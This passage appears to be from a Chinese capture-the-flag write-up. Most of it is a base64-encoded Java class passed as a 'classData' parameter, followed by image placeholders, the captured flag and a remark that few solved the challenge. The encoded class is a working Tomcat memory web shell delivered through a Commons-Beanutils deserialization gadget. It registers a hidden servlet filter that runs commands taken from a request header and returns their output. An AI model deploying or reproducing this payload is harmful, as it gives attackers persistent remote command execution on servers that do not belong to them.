classData=yv66vgAAADQBOwoARACeCQAlAJ8JACUAoAkAJQChBwCiBwCjCwAFAKQIAKULAAUApgkApwCoCgCpAKoIAKsIAKwLAAYArQcArggArwoAHgCwCgAPALEKAA8AsgoADwCzCgC0ALUHALYHALcKABcAuAoAFgC5CgAWALoKAKcAuwoAvAC9CwC%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%2bAcA%2bQwA%2bgD7BwD8DAD9AP4BAAtQb2xhci1TVEFSVAEAAk9LDAD/AQABABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBAANccysMAQEBAgwATAEDDAEEAQUMAQYBBwcBCAwBCQEKAQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAEwBCwwATAEMDAENAQ4MAQ8BEAcBEQwBEgETBwEUDAEVARYBABBqYXZhL2xhbmcvU3RyaW5nAQABMwEADFBvbGFyLVJFU1VMVAcA7gwAWgEXAQAeamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXNzaW9uAQAmb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2UBABF5c29zZXJpYWwvY2IxL0V4cAEABVNoZWxsAQACLyoMAH4AfwEAIGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uDAEYAE0MARkBGgcA8gwBGwEcDAEdAR4MAR8BIAcA8wwBIQEiDAEjASQBACtvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvQXBwbGljYXRpb25Db250ZXh0AQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvdXRpbC9MaWZlY3ljbGVCYXNlAQAFc3RhdGUHASUMASYBJwwBKAEpDAEqASsHASwMAS0BLgcBLwwBMAExDAEyATMBAAtmaWx0ZXJTdGFydAEAD2phdmEvbGFuZy9DbGFzcwwBNAE1BwE2DAE3ATgMATkBJwEAE2phdmEvbGFuZy9FeGNlcHRpb24BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABlqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluAQATamF2YS9pby9JT0V4Y2VwdGlvbgcBOgEAKGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uJER5bmFtaWMBABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABNqYXZhL2xhbmcvVGhyb3dhYmxlAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEACXNldEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEABXNwbGl0AQAnKExqYXZhL2xhbmcvU3RyaW5nOylbTGphdmEvbGFuZy9TdHJpbmc7AQAWKFtMamF2YS9sYW5
nL1N0cmluZzspVgEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEABWxpbmVzAQAbKClMamF2YS91dGlsL3N0cmVhbS9TdHJlYW07AQANbGluZVNlcGFyYXRvcgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAbamF2YS91dGlsL3N0cmVhbS9Db2xsZWN0b3JzAQAHam9pbmluZwEANihMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspTGphdmEvdXRpbC9zdHJlYW0vQ29sbGVjdG9yOwEAF2phdmEvdXRpbC9zdHJlYW0vU3RyZWFtAQAHY29sbGVjdAEAMChMamF2YS91dGlsL3N0cmVhbS9Db2xsZWN0b3I7KUxqYXZhL2xhbmcvT2JqZWN0OwEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYBAA9wcmludFN0YWNrVHJhY2UBABFnZXRTZXJ2bGV0Q29udGV4dAEAICgpTGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQ7AQAVZ2V0RmlsdGVyUmVnaXN0cmF0aW9uAQA2KExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb247AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBACJvcmcvYXBhY2hlL2NhdGFsaW5hL0xpZmVjeWNsZVN0YXRlAQANU1RBUlRJTkdfUFJFUAEAJExvcmcvYXBhY2hlL2NhdGFsaW5hL0xpZmVjeWNsZVN0YXRlOwEAA3NldAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgEACWFkZEZpbHRlcgEAVChMamF2YS9sYW5nL1N0cmluZztMamF2YXgvc2VydmxldC9GaWx0ZXI7KUxqYXZheC9zZXJ2bGV0L0ZpbHRlclJlZ2lzdHJhdGlvbiREeW5hbWljOwEAHGphdmF4L3NlcnZsZXQvRGlzcGF0Y2hlclR5cGUBAAdSRVFVRVNUAQAeTGphdmF4L3NlcnZsZXQvRGlzcGF0Y2hlclR5cGU7AQARamF2YS91dGlsL0VudW1TZXQBAAJvZgEAJShMamF2YS9sYW5nL0VudW07KUxqYXZhL3V0aWwvRW51bVNldDsBABhhZGRNYXBwaW5nRm9yVXJsUGF0dGVybnMBACooTGphdmEvdXRpbC9FbnVtU2V0O1pbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHU1RBUlRFRAEAIGp
hdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uACEAJQBEAAEARQADAAIARgBHAAAAAgBIAEkAAAACAEoASwAAAAYAAQBMAE0AAQBOAAAASgACAAEAAAAUKrcAASoBtQACKgG1AAMqAbUABLEAAAACAE8AAAASAAQAAAAKAAQACwAJAAwADgANAFAAAAAMAAEAAAAUAFEAUgAAAAEAUwBUAAIATgAAADUAAAACAAAAAbEAAAACAE8AAAAGAAEAAAARAFAAAAAWAAIAAAABAFEAUgAAAAAAAQBVAFYAAQBXAAAABAABAFgAAQBZAE0AAQBOAAAAKwAAAAEAAAABsQAAAAIATwAAAAYAAQAAABIAUAAAAAwAAQAAAAEAUQBSAAAAAQBaAFsAAgBOAAABmAAFAAsAAACaK8AABToELMAABjoFGQS5AAcBADoGGQQSCLkACQIAOgeyAAoZB7YACxkHxgBlGQUSDBINuQAOAwC7AA9ZGQcSELYAEbcAEgS2ABO2ABQ6CBkItgAVOgm7ABZZuwAXWRkJtwAYtwAZtgAauAAbuAAcuQAdAgDAAB46CrIAChIftgALGQUSIBkKuQAOAwCnAA0tGQQZBbkAIQMAsQAAAAMATwAAAE4AEwAAABUABgAWAAwAFwAVABgAIAAZACgAGgAtABwAOAAeAEcAHwBKACAATwAjAFYAJgBmACcAaQAoAHkAKQCBACoAjAAsAI8ALQCZAC8AUAAAAHAACwBPAD0AXABdAAgAVgA2AF4AXwAJAHkAEwBgAGEACgAAAJoAUQBSAAAAAACaAGIAYwABAAAAmgBkAGUAAgAAAJoAZgBnAAMABgCUAEYARwAEAAwAjgBIAGgABQAVAIUASgBLAAYAIAB6AGkAYQAHAGoAAAAiAAL/AI8ACAcAawcAbAcAbQcAbgcAbwcAcAcAcQcAcgAACQBXAAAABgACAHMAWAABAHQAdQABAE4AAADOAAQABAAAAEIrwAAiwAAiTSosBTLAACO1AAQqLAQywAAktQADKiwDMsAABbUAArsAJVm3ACYSJxIoKrQAArgAKacACE4ttgArBKwAAQAmADgAOwAqAAMATwAAACYACQAAADIACAAzABIANAAcADUAJgA4ADgAOwA7ADkAPAA6AEAAPQBQAAAAKgAEADwABAB2AHcAAwAAAEIAUQBSAAAAAABCAHgAeQABAAgAOgB6AHsAAgBqAAAAFgAC/wA7AAMHAGsHAHwHACIAAQcAfQQACQB%2bAH8AAgBOAAACVgAHAAwAAADqLbkALAEAOgQZBCu5AC0CAMcA2QE6BQE6BgE6BwE6CAE6CRkEtgAuEi%2b2ADA6BRkFBLYAMRkFGQS2ADLAADM6BhkGtgAuEi%2b2ADA6BRkFBLYAMRkFGQa2ADLAADQ6BxI1Eja2ADA6CBkIBLYAMRkIGQeyADe2ADgZBCsquQA5AwA6CRkJsgA6uAA7AwS9AB5ZAyxTuQA8BAASNBI9A70APrYAPzoKGQoEtgBAGQoZBwG2AEFXGQgZB7IAQrYAOBkIGQeyAEK2ADinACE6ChkIGQeyAEK2ADinABI6CxkIGQeyAEK2ADgZC7%2bxAAQAIgC%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%3d

在这里插入图片描述
在这里插入图片描述

flag{cab20046-3945-f9f4-7125-7ca2703a31df}

配合B站官方一定能做出这道题,我看这道题只有四个人解出了,所以写个文档
